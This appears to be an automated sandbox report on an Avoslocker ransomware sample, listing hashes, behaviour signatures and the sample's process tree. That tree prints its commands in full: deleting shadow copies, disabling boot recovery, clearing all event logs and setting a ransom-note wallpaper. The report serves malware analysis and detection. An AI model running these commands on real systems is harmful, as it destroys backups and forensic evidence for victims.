Analysis

  • max time kernel
    120s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    31-05-2024 07:39

General

  • Target

    eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe

  • Size

    1002KB

  • MD5

    97b34aecdcbe69cc57b4d321b0700cd9

  • SHA1

    b2f2a027512a6f2b4ea856468eaccf6250a555d4

  • SHA256

    eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115

  • SHA512

    5436ad5e25083f167de6a30d2aa06d4dce514a4b5a2cc6d9ca5a4b1f7d3903f2d0bb70f64fa4562b26857dac7bd36ef7c8bb5b766d4975a0fef39a01dac63327

  • SSDEEP

    24576:Lgg34ayddj+yYCVj2EG1bWIL0oHPVRV37AXVJmUCOsvxFdUwcT:E2edj4CwE4bFbl7AqUgvrFcT

Malware Config

Signatures

  • Avoslocker Ransomware

    Avoslocker is a relatively new ransomware, that was observed in late June and early July, 2021.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Renames multiple (10387) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe
    "C:\Users\Admin\AppData\Local\Temp\eba3a5a7171c68752065faeff30716844b53d14bba821bf33002189b64eda115.exe"
    1⤵
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1712
    • C:\Windows\system32\cmd.exe
      cmd /c wmic shadowcopy delete /nointeractive
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2972
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic shadowcopy delete /nointeractive
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3648
    • C:\Windows\system32\cmd.exe
      cmd /c vssadmin.exe Delete Shadows /All /Quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2984
      • C:\Windows\system32\vssadmin.exe
        vssadmin.exe Delete Shadows /All /Quiet
        3⤵
        • Interacts with shadow copies
        PID:3640
    • C:\Windows\system32\cmd.exe
      cmd /c bcdedit /set {default} recoveryenabled No
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2012
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} recoveryenabled No
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:3664
    • C:\Windows\system32\cmd.exe
      cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1260
      • C:\Windows\system32\bcdedit.exe
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:3728
    • C:\Windows\system32\cmd.exe
      cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2028
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3656
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2384
      • C:\Windows\system32\reg.exe
        "C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2114547645.png /f
        3⤵
        • Sets desktop wallpaper using registry
        PID:3848
      • C:\Windows\system32\rundll32.exe
        "C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False
        3⤵
          PID:3636
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3680

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\GET_YOUR_FILES_BACK.txt

      Filesize

      1011B

      MD5

      36d08e3dadf813cefd755ba410908b16

      SHA1

      3ec7b14da6eaaf24f99be6c68301a6a7d05e6e5a

      SHA256

      4b38c6732593914ff892b2ed9fd337d4fa3cac8df096bae3fc532e606b3d1752

      SHA512

      8828d2f7cd763dfafff76f28ed990498a241ae6abace6fa7ce96060672216143d6c5a92eef8eacdf1060ae239c275571640328452b2e516ed90d8c14b245c52e

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      4c6a17abe24e6c9b1011e7791b05b7f9

      SHA1

      43f816186a00833788399e2085dc25243966b2f2

      SHA256

      01c56b2b5d1c6ef2f9f8c1760ef6e57b71e162d166b93c957d0244857e45fb6d

      SHA512

      276f6f5e8b60f313ac35e12bf0443bd86219d28f1d05332b3d1243430216e25909bbaad9d6db05fbf285614474aff2033f049b4545ce1c0180696fee485439d3

    • \??\PIPE\srvsvc

      MD5

      d41d8cd98f00b204e9800998ecf8427e

      SHA1

      da39a3ee5e6b4b0d3255bfef95601890afd80709

      SHA256

      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

      SHA512

      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    • memory/1712-24506-0x00000000001D0000-0x0000000000213000-memory.dmp

      Filesize

      268KB

    • memory/1712-12828-0x0000000000400000-0x00000000004E5000-memory.dmp

      Filesize

      916KB

    • memory/1712-7-0x0000000000400000-0x00000000004E5000-memory.dmp

      Filesize

      916KB

    • memory/1712-4-0x0000000000400000-0x00000000004E5000-memory.dmp

      Filesize

      916KB

    • memory/1712-5-0x0000000000401000-0x000000000049D000-memory.dmp

      Filesize

      624KB

    • memory/1712-2-0x0000000000400000-0x00000000004E5000-memory.dmp

      Filesize

      916KB

    • memory/1712-9-0x0000000000400000-0x00000000004E5000-memory.dmp

      Filesize

      916KB

    • memory/1712-10-0x0000000000400000-0x00000000004E5000-memory.dmp

      Filesize

      916KB

    • memory/1712-8-0x00000000002A0000-0x00000000002A1000-memory.dmp

      Filesize

      4KB

    • memory/1712-3-0x00000000001D0000-0x0000000000213000-memory.dmp

      Filesize

      268KB

    • memory/1712-6-0x0000000000400000-0x00000000004E5000-memory.dmp

      Filesize

      916KB

    • memory/1712-1-0x0000000000400000-0x00000000004E5000-memory.dmp

      Filesize

      916KB

    • memory/1712-18936-0x0000000000401000-0x000000000049D000-memory.dmp

      Filesize

      624KB

    • memory/1712-18933-0x00000000001D0000-0x0000000000213000-memory.dmp

      Filesize

      268KB

    • memory/1712-18914-0x0000000000400000-0x00000000004E5000-memory.dmp

      Filesize

      916KB

    • memory/1712-0-0x0000000000400000-0x00000000004E5000-memory.dmp

      Filesize

      916KB

    • memory/1712-24507-0x0000000000401000-0x000000000049D000-memory.dmp

      Filesize

      624KB

    • memory/1712-24505-0x0000000000400000-0x00000000004E5000-memory.dmp

      Filesize

      916KB

    • memory/2384-24515-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

      Filesize

      32KB

    • memory/2384-24514-0x000000001B8A0000-0x000000001BB82000-memory.dmp

      Filesize

      2.9MB

    • memory/3656-762-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

      Filesize

      32KB

    • memory/3656-667-0x000000001B7F0000-0x000000001BAD2000-memory.dmp

      Filesize

      2.9MB